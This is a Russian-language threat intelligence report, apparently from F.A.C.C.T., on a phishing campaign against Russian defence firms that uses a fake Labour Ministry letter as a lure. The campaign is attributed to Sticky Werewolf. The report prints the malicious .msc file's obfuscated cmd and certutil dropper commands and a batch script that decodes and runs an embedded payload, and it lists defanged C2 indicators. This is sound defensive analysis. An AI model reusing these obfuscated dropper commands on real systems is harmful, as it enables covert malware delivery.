Липкий клон: MimiStick — подражатели или эволюция Sticky Werewolf

20 сентября специалисты F.A.C.C.T. Threat Intelligence обнаружили вредоносный файл «17_09_2024.msc», в процессе выполнения которого жертве демонстрировался интересный документ-приманка. Речь о письме Минтруда РФ директорам предприятий оборонно-промышленного комплекса. Изучая приманку, специалисты предположили, что за атакой с использованием этого файла стоит группа кибершпионов  Sticky Werewolf — весной этого года они уже использовали похожий документ. Однако совокупность тактик, техник, процедур (TTP) и инфраструктурные особенности указывали на то, что первоначальная гипотеза могла быть ошибочной, а на самом деле за атакой стоит совершенно другой злоумышленник. В настоящий момент эксперты F.A.C.C.T. отслеживают эту активность под именем MimiStick. Подробностями поделились Артем Грищенко, ведущий специалист по анализу вредоносного кода, F.A.C.C.T., и Алена Шандер, аналитик группы исследования сложных угроз, F.A.C.C.T.

При открытии файла 17_09_2024.msc запускаются следующие команды:

"C:\Windows\System32\cmd.exe" /v /c set "k=%cd%\17_09_2024.msc"&(IF NOT EXIST "!k!" (for /f "tokens=* usebackq" %g in (`where /R "%userprofile%" "17_09_2024.ms"?`) do set "k=%g")>nul 2>&1)&set "f=r"&set "o=%localappdata%"&>nul ce!f!tutil -decode """!k!""" !o!\xrks.t&ren "!o!\xrks.t" xrks.cmD&!o!\xrks

where /R "C:\Users\admin" "17_09_2024.ms"?
certutil -decode """C:\Users\admin\AppData\Local\Temp\17_09_2024.msc""" C:\Users\admin\AppData\Local\xrks.t

С помощью этих команд будет извлекаться упакованное содержимое файла «17_09_2024.msc». После распаковки будет создан файл %localappdata%\xrks.t с командным файлом внутри. Его содержимое следующее:

@echo off
SET "go=%~f0"
set h=r
set "td=%temp%"
echo T > "%td%\th.txt"
findstr /b /l "VqQAAMAAAAEAAAA//8AALgAA" "%go%" >> "%td%\th.txt"
>nul ce%h%tutil.exe -decode "%td%\th.txt" "%td%\xkiq.txt"
ren "%td%\xkiq.txt" wqhe.exe
del "%td%\th.txt"
start /b "" "%td%\wqhe.exe"
exit /b 0
VqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAA[REDACTED]...

Далее выполняются 2 команды:

findstr /b /l "VqQAAMAAAAEAAAA//8AALgAA" "C:\Users\admin\AppData\Local\xrks.cmD"

certutil.exe -decode "C:\Users\admin\AppData\Local\Temp\th.txt" "C:\Users\admin\AppData\Local\Temp\xkiq.txt"

Они нужны для того, чтобы обнаружить содержащуюся в конце bat-файла упакованную нагрузку. Нагрузка - это base64-строка, начинающаяся с подстроки "VqQAAMAAAAEAAAA//8AALgAA". Нагрузка декодируется и сохраняется в файл %Temp%\xkiq.txt.
 Затем она переименовывается в %Temp%\wqhe.exe, удаляется исходный файл th.txt, а файл wqhe.exe запускается.

Нагрузка содержит в ресурсах PDF-приманку, которая после запуска файла сохраняется в %Temp%\17_09_2024_0.pdf и открывается. Содержимое приманки приведено на рисунке ниже. 

Схожие приманки мы наблюдали в ряде атак группы Sticky Werewolf, например, приманка из атаки группы Sticky Werewolf от марта 2024 года приведена на рисунке ниже:

После открытия приманки нагрузка запускает содержащийся в себе зашифрованный шеллкод.

Нагрузка - стэйджер, который загружает и запускает вторую стадию с удаленного узла. В качестве второй стадии используется Sliver implant c С2: techitzone[.]ru:443.

Домен techitzone[.]ru зарегистрирован 2 сентября 2024 года.

С этим доменом связаны несколько дополнительных, которые были зарегистрированы тем же атакующим и, вероятно, уже использовались или будут использоваться им в ближайшее время:

• about-tech[.]ru – зарегистрирован 2023-12-07

• orkprank[.]ru - зарегистрирован 2024-06-18

• borosan[.]ru – зарегистрирован 2024-07-15

• mysafer[.]ru – зарегистрирован 2024-07-05

• rtxcore[.]ru - зарегистрирован 2024-09-02

• min-trud-gov[.]ru – зарегистрирован 2024-09-23

Домен min-trud-gov[.]ru, мимикрирующий под домен Минтруда России, вызывает особый интерес, поскольку был зарегистрирован относительно недавно и совпадает по легенде с приманкой из сентябрьской атаки группы, обнаруженной в ходе этого исследования. Высока вероятность, что он будет использоваться злоумышленниками в ближайшее время для проведения фишинговых рассылок.

UPD: 26.09.2024

26 сентября специалисты F.A.C.C.T. обнаружили архив 25-09-2024.7z (MD5: 79e8525ffb6903067c0a8452be73594c), накануне загруженный на публичную песочницу.

Этот архив содержит файл 25-09-2024.msc, задача которого - распаковать и запустить PDF-приманку и многоуровневую цепочку, приводящую к установке финальной нагрузки в виде Quasar RAT. В качестве C2 использовался: 193[.]124[.]33[.]141:4782, который ранее уже был замечен в атаках группы Sticky Werewolf.

Содержимое PDF-приманки представлено на рисунке 4.

Отдельное внимание стоит обратить на шапку PDF-приманки, там в качестве email указан адрес info@min-trud-gov[.]ru, а в более ранних приманках в качестве email был указан min-trud.gov@mail[.]ru О домене min-trud-gov[.]ru мы сообщали выше. Предположительно, именно с этих адресов, указанных в приманках, злоумышленники и осуществляли свои рассылки.

Цепочка атаки: 7z -> MMC -> CERTUTIL -> NSIS EXE -> BAT -> AutoIt script -> RegAsm (Quasar RAT). Несложно заметить, что она идентична той, что описана в этом блоге, за исключением того, что в качестве финальной нагрузки вместо Sliver Implant разворачивался Quasar RAT.

На основе этих находок можно заключить, что наше первоначальное предположение было верным, и все-таки за кампанией MimiStick стоит группа Sticky Werewolf. Выходит, что злоумышленники добавили в свой арсенал Sliver implant и стали использовать новый килчейн для его установки, а также для установки своих старых инструментов, в частности Quasar RAT.

Индикаторы компрометации

Файловые индикаторы

Сетевые индикаторы

• techitzone[.]ru

• 213.183.54[.]123

• hxxps://213.183.54[.]123:8444/Inter-Regular.woff/-EEbEJB0DX9DBUIHJe0hJQOEOEKOlr-p4xEk6WSSs0tUfsCIdSqYB23qz_Pr_6TmAmEDhpyem74y-_Jv0fO3T12fkp7BqWUKHCqkECIyYA1OqhGzh9QFriVKGM0n3jnnc1Zqenuj-d2nDXL4aUmKRBO7jRdvO6BBXfxw4S

• about-tech[.]ru

• orkprank[.]ru

• borosan[.]ru

• mysafer[.]ru

• rtxcore[.]ru

• min-trud-gov[.]ru